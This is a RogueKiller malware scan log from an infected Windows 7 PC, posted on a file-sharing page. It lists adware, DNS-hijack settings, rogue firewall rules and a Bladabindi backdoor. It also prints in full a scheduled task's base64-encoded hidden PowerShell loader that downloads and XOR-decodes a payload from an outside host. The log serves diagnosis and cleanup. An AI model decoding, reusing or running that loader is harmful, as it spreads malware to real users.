rk-C878.tmp.txt

Document joint : GJAen0eJHUE_rk-C878.tmp.txt

Cliquez pour partager vos propres fichiers

Format du document : text/plain

Prévisualisation

ÿþRogueKiller V12.11.21.0 [Oct 23 2017] (Premium) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 32 bits version
Started in : Normal mode
User : Abokr [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller.exe
Mode : Scan -- Date : 10/25/2017 15:54:01 (Duration : 01:29:11)

¤¤¤ Processes : 1 ¤¤¤
[VT.Unknown] Clear Database.exe(1660) -- C:\Program Files\Clear Database\Clear Database.exe[-] -> Found

¤¤¤ Registry : 61 ¤¤¤
[PUP.Gen0] HKEY_CLASSES_ROOT\CLSID\{2ED35963-FCC9-4698-B619-787FE1C75079} (C:\Users\Abokr\AppData\Roaming\VolIE\IE\AdSafe_32.dll) -> Found
[PUP.Gen0] HKEY_CLASSES_ROOT\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000} (C:\Program Files\YTDownloader\AniGIF.ocx) -> Found
[PUP.Gen0] HKEY_CLASSES_ROOT\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF} (C:\Program Files\YTDownloader\AniGIF.ocx) -> Found
[PUP.Gen0] HKEY_CLASSES_ROOT\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF} (C:\Program Files\YTDownloader\AniGIF.ocx) -> Found
[PUP.Gen0] HKEY_CLASSES_ROOT\CLSID\{D879A501-50A7-BEFC-A4C5-32DC6E0CB208} (C:\Windows\System32\mscoree.dll) -> Found
[PUP.Gen0] HKEY_CLASSES_ROOT\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5} (C:\Users\Abokr\AppData\Local\Temp\2B20\temp\120F.exe) -> Found
[PUP.Gen1] HKEY_LOCAL_MACHINE\Software\MaxPower -> Found
[PUP.Gen1] HKEY_LOCAL_MACHINE\Software\{12A61307-94CD-4F8E-94BC-918E511FAA81} -> Found
[PUP.Gen1] HKEY_LOCAL_MACHINE\Software\{12DA0E6F-5543-440C-BAA2-28BF01070AFA} -> Found
[PUP.Gen1] HKEY_LOCAL_MACHINE\Software\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0} -> Found
[PUP.Gen1] HKEY_USERS\.DEFAULT\Software\VNT -> Found
[PUP.Gen1] HKEY_USERS\S-1-5-21-1597058447-2255405293-4085650674-1000\Software\OB -> Found
[PUP.Gen1] HKEY_USERS\S-1-5-21-1597058447-2255405293-4085650674-1000\Software\Super Optimizer -> Found
[PUP.Gen1] HKEY_USERS\S-1-5-21-1597058447-2255405293-4085650674-1000\Software\WebApp -> Found
[PUP.Gen1] HKEY_USERS\S-1-5-18\Software\VNT -> Found
[PUP.Gen1] HKEY_USERS\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA} -> Found
[PUP.Gen1] HKEY_USERS\S-1-5-21-1597058447-2255405293-4085650674-1000\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA} -> Found
[PUP.Gen1] HKEY_USERS\S-1-5-18\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA} -> Found
[PUP.Gen1] HKEY_USERS\.DEFAULT\Software\AppDataLow\Software\_CrossriderRegNamePlaceHolder_ -> Found
[PUP.MailRU|PUP.Gen1] HKEY_USERS\S-1-5-21-1597058447-2255405293-4085650674-1000\Software\AppDataLow\Software\Mail.Ru -> Found
[PUP.Gen1] HKEY_USERS\S-1-5-18\Software\AppDataLow\Software\_CrossriderRegNamePlaceHolder_ -> Found
[PUP.Gen1] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564 -> Found
[PUP.Gen1] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{D01A33E2-0A34-4659-82AA-8A90C51C0D21} -> Found
[PUP.Gen1] HKEY_USERS\S-1-5-21-1597058447-2255405293-4085650674-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\{D01A33E2-0A34-4659-82AA-8A90C51C0D21} -> Found
[PUP.Gen0] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\BaiduAntivirusIconLock | (default) : {0A93904A-BB1E-4a0c-9753-B57B9AE272CC} -> Found
[PUP.Gen0] HKEY_USERS\S-1-5-21-1597058447-2255405293-4085650674-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2ED35963-FCC9-4698-B619-787FE1C75079} (C:\Users\Abokr\AppData\Roaming\VolIE\IE\AdSafe_32.dll) -> Found
[VT.Unknown] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | 6b53d59093b772b4b9cd5c45b0ffecc1 : "C:\Users\Abokr\AppData\Local\temp\Chrome.exe" .. [-] -> Found
[VT.Backdoor:MSIL/Bladabindi] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | 8e6bcb3662129def0075a51e98fb3a56 : "C:\Users\Abokr\AppData\Local\tempsystem.exe" .. [-] -> Found
[VT.Backdoor:MSIL/Bladabindi] HKEY_USERS\S-1-5-21-1597058447-2255405293-4085650674-1000\Software\Microsoft\Windows\CurrentVersion\Run | 8e6bcb3662129def0075a51e98fb3a56 : "C:\Users\Abokr\AppData\Local\tempsystem.exe" .. [-] -> Found
[PUP.Gen1|PUM.HomePage] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Start Page : http://search.gboxapp.com/ -> Found
[PUP.Gen1|PUM.HomePage] HKEY_USERS\S-1-5-21-1597058447-2255405293-4085650674-1000\Software\Microsoft\Internet Explorer\Main | Start Page : http://search.gboxapp.com/ -> Found
[Adw.DNSUnlocker] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | NameServer : 82.163.143.176 82.163.142.178 ([GB][-]) -> Found
[Adw.DNSUnlocker] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters | NameServer : 82.163.143.176 82.163.142.178 ([GB][-]) -> Found
[Adw.DNSUnlocker] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{474076E4-9818-43AC-9080-3E6AE347EF83} | NameServer : 82.163.143.176 82.163.142.178 ([GB][-]) -> Found
[Adw.DNSUnlocker] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{474076E4-9818-43AC-9080-3E6AE347EF83} | NameServer : 82.163.143.176 82.163.142.178 ([GB][-]) -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {315B5AB2-73DF-408D-A256-9F1E68BFC4D3} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\ProgramData\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {1C78B3F7-98CC-4184-AAF8-34DED0E36D39} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\ProgramData\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {A5BBDB86-7B42-4E0E-85B4-C6C914944F7F} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Users\Abokr\AppData\Roaming\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {7EC25E57-A90B-42AF-BE19-C6E2639400B6} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Users\Abokr\AppData\Roaming\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {71B1591F-8079-414C-B538-2471EBF4A3D3} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Windows\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {7D56653B-40DC-406B-B2FB-0B8C1D109E02} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Windows\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {1463A885-A91B-4B5C-B0CB-56888E273CF8} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\Users\Abokr\AppData\Roaming\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {DBA9A62F-BA8E-4136-AF94-DE004F8E800B} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\Users\Abokr\AppData\Roaming\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {C3FFA17E-4CE2-43B2-9AD0-B35D4578C45D} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\Windows\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {CF7B6A81-DEFA-43E0-B508-D9664DC42CA8} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\ProgramData\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {1CB46CCE-3681-4B81-B315-19A9D4EA1D8D} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\Windows\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {0B2F577B-8F11-4AA6-8093-6AF0B9339D08} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\ProgramData\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {315B5AB2-73DF-408D-A256-9F1E68BFC4D3} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\ProgramData\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {1C78B3F7-98CC-4184-AAF8-34DED0E36D39} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\ProgramData\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {A5BBDB86-7B42-4E0E-85B4-C6C914944F7F} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Users\Abokr\AppData\Roaming\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {7EC25E57-A90B-42AF-BE19-C6E2639400B6} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Users\Abokr\AppData\Roaming\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {71B1591F-8079-414C-B538-2471EBF4A3D3} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Windows\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {7D56653B-40DC-406B-B2FB-0B8C1D109E02} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Windows\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {1463A885-A91B-4B5C-B0CB-56888E273CF8} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\Users\Abokr\AppData\Roaming\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {DBA9A62F-BA8E-4136-AF94-DE004F8E800B} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\Users\Abokr\AppData\Roaming\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {C3FFA17E-4CE2-43B2-9AD0-B35D4578C45D} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\Windows\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {CF7B6A81-DEFA-43E0-B508-D9664DC42CA8} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\ProgramData\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {1CB46CCE-3681-4B81-B315-19A9D4EA1D8D} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\Windows\svchost.exe|Name=svchost.exe| [x] -> Found
[Hj.Name] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {0B2F577B-8F11-4AA6-8093-6AF0B9339D08} : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\ProgramData\svchost.exe|Name=svchost.exe| [x] -> Found
[PUM.Policies] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0 -> Found
[Suspicious.Path] HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{2CMXVPRJ-133O-EXC8-7561-040LO4WH4BBM} | StubPath : C:\Users\Abokr\AppData\Roaming\System32\Chrome.exe [x] -> Found

¤¤¤ Tasks : 6 ¤¤¤
[PUP.Gen0|VT.PUP.Optional.SuperOptimizer] %WINDIR%\Tasks\Superclean.job -- c:\programdata\{7c85c3b5-5f8a-cb45-7c85-5c3b55f80ed5}\hqghumeaylnlf.exe (--startup=1 --single) -> Found
[VT.PUP.Optional.SuperOptimizer] \Superclean -- c:\programdata\{7c85c3b5-5f8a-cb45-7c85-5c3b55f80ed5}\hqghumeaylnlf.exe (--startup=1 --single) -> Found
[Tr.Gen1] \{3187243A-862C-9391-83F5-B99C89AA9139} -- C:\ProgramData\{973B1259-2090-A5F2-67ED-53AF72919BE6}\D5A2F8D5-6209-4F7E-2209-796E5E406242.exe (/run) -> Found
[Mal.Powershell] \{B1F4BB87-2730-8057-F43B-54703CAC91C2} -- C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe (-windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAcABvAHIAdABuAGUAdwAuAG4AZQB0AC8AdQAvAD8AcQA9AE4AWQBiAGUAZQBKAFEASQBMAHgAZABhAHAAWABHAEcAeAA1AGcAYgBCAGsAcQB5AFUAdgBZAEQAUAB5AF8AMwBuAEMAaQBsADcAVwBIAHUAZgA0AHcAWQBtADgANwB4AGsAVQA2AEYAMQBRAEcAMgBQAGMAZABmAGcAegA2AHgANwB1ADgAQgB0AGsATAB1ADcAQQBfAEoAXwB2AE4ASgBRAFUAYwBFAF8AYQBHADMANgAwAEwAcQBzAEcAYwB1AGwANABEADIAUQBoADcAbgBPAEMAagB1AE0AegBBAF8AMQBBAG8ANgB4ADgAVQBlAEEAOABpAE4ATwBlAGMAawA5AEIAcABBAG4AYwBCAFkALQB0AFIAQQA0ADQAZwB1AFQAQgBqAGQAawBuADIATABYAEsAaQByAEkARQBaAHMAOQBoAHYAVQBQAFMAcABUAGQARQBGAGcAQgA2AHQAdwAzAEIAOABiAE4ARAA1AGIAZgBEAFAAegBlAHgAcABCAG0AYwBGAEgAcgBfAEwAVABDAE4AdABUAEUAYgAwADgAaAAtAGEANAA3AEwAMwB0AFoAZABzAGYARQAwAFkAYQAxAHcAWQBDAFoAUgA1AG0AQQBEAFAARgBIAF8AaABfAGgAUAByAGcARQBJAG4AeQBDAFkANwBRAEEATQBMAE4AdABuAFYAZQAtAF8AOAB5AHQALQBhAEwASABzAHUAZQBHAFIAMwBXAGYAeABfADEASABxADAAbQBHAEoAdAA0AE8AYgBVAEQAVgA5AEIAbAB4AFgAOQBvADAARABQAG8AMAA4AHIAWQBtAFYARgBmAEYAMQBhADIARgBIAHUAcgBTAFUAQgBQAGEAZgBLAHQAVABHAFoAOQAwAFIAZwBiAEYAMwA1AE4ASQAxAHcATABoAE4AYQBMAFIAbABfAEoAbQB6AHoAOQB6AEYAYgBtAHMAcQBSAE0AMwBWAEUAbwBqAEwAVABxAHEARwBVAGMARABPAG4AUgBLAGcAMwA3AEQAZQAyAEcAegBEAGIAQgBSAEsANwBzAHYAOABzAHAAYwBQAF8ANwB4AGcAMQBYAEIAZABPAGEATgByAGMAWABOAHEAawAyAGgAVABEADAAZwBxAEYAdQBiAHUAQQBtAEoAZwBMAEEAZQBRAFYAQQBOAFAAbwBmAEMAYQBfADEASAB1AC0AYgB0AHYAZgAxAEMAOABPAHMAQgBIAFoAUQAxAHYAUgA3ADQAdwBEADIAZAAtAEEAJgBjAD0AaABTAEMAbABFAG8ARgBvADUAawAxADUAcAByAEwAaABfAFMAVQBrAGsAbwA1AG8AYgA4AG8ATABaAGQAQgBhAFkAZgBQAEwATgBIAGgAXwBTAEQAWQBFAE8AdgB1AE8ASgBMAEcAWgBpAHAATwBfADMASABmADAANQBuAEcAcgBKAGgARQA2AEQAOAByAGIAZwBkAGIAeABiAFcARQBJAFQARQBnAGEAZQBOAGIATgBCADUARgBBAGcAZwBrAEQAOQA2AFMAUgBFAHUAQwA5ADcAYwA2AHQARgBEADAAdQBQAGwAcgBpAHAATQA2AE8ASwBvAGkAUgBXAFkAXwBSAF8ANABZADMAaQBhAGMARQBqAGUAVQBmADIAawBRADYAOQBXAFMASgBpAHkAcABoAHAASAB2AEgAMwBOAC0AYwA5ADgARwB6AGIAUQBMAEEAMgBhAHAAbgBDAEUARABjAHgASwBEADkAcgB6AGsAMAA3AEoAZAAzAG4ANAB6AHIAWgB6AGYAVgBhAGIASQBkAFMAMQA3AEsAcgBzAGwARwBaAHEAUwBMAG8AYwBnAFIAdQBvAGsAawBnADEANQBOAFAAeQBSAFYAYgByAHgAbQB2AEwATABTAFcAcABlADQATgAxAFYAbwB0AEgAegBtADkARwBkAG8ATABzAFYARgAyADgAcABRAEEAcgBUADIATgA3AFoAMgBRAG8AeABnAFYAQQBZADkAOQBPAHIAeABEAHgAVwBiAE4AcgBxAGwATwBqAE8AcgAtAGwAVABHAEQAdQBtADEANwBLAFcAVgBCADQAOAA1AHQAeAAyADgARQBZAG4AbQBuAEgAeABsAEQAMQBjAGgAbQBUAFgAbwA5AFQAZgBxADkANwBvADUALQBZAHMAUABDAEMAUABuAFMAXwBCAEwARQBBAEcATABRADgAWQB2AGcAeQBaAEsAWgBIAFcAMgAxADEANwAxAHUAZwBpAGIAOQB6AHcAdQAzAHMARQBZADMAWgB2AEQATwAxAHMAVgBTADIAaQBmAE4AMwB2ADMASgBnAHEAVwBJAEYATQBWAGgAXwBDAGYAVwBaAGMAZQBNAFUAOQBhADEAWgB1ADcAZAAxAGIAUQBFAGEAWABzAFoAcQAzAGkARQByAC0AWQBRADIAVQBPAEsAVwBFAGIASQBGAFgAYwBuAE8AWQBIAE4ASwBLADEAbwA2AEEANABoADQAOQB2AFQAQQBXAFQAYgAyAGkASABMAGUAOQBDAEIAbABLAE0AeABvADEAZgBMADIAYQBTADUAMwBBAGEAawA1AGoAbABuADAATgBHAG0ASABOAFkASQA2ADkAaQBzAEUAWQAwAE0AeQB4AGkAawBLAEwAQwBtAFUAZQBZAGwAUABfAFcAbQBtAHUASAB0AHEAeQBxAGgALQBkAGsAUABYAHIATgBNAFgAMQBnAC0ANQBMAFUAYQA1AF8AdgBOAHAAXwBlAEIARAA3AGYAZAByAFYAawAxADIARQBRAHUATABDADIAQQBkAGcAcQBxAEQAZwBUADQAcwBrAFIALQBKAHcAdgBqAEoAVgBNADMAXwBzAHcAbAB5AFkAbgA2AHEAXwBXAHUAZAA4AEsAZgBTAEYAVwBpAHoATQBoAGoAZwB4ADAAVgBiADQARwBDAGsAVgBBADYASgAzAFMAQwBfAFEAdQBFAFUATABNADcAWQBDAE4AWAB0AEgAOABUAEcARAAxAE4AOQB4ADkAagBqADUAcwAxADEAZgBjAGYARAB6AG8AQQBCADQAJgByAD0AMgA5ADIAOAA5ADIANwA5ADYAMAAwADkANQAwADIAMwAxADcAMwAiADsAJABzAHQAcwBrAD0AIgB7AEIAMQBGADQAQgBCADgANwAtADIANwAzADAALQA4ADAANQA3AC0ARgA0ADMAQgAtADUANAA3ADAAMwBDAEEAQwA5ADEAQwAyAH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAA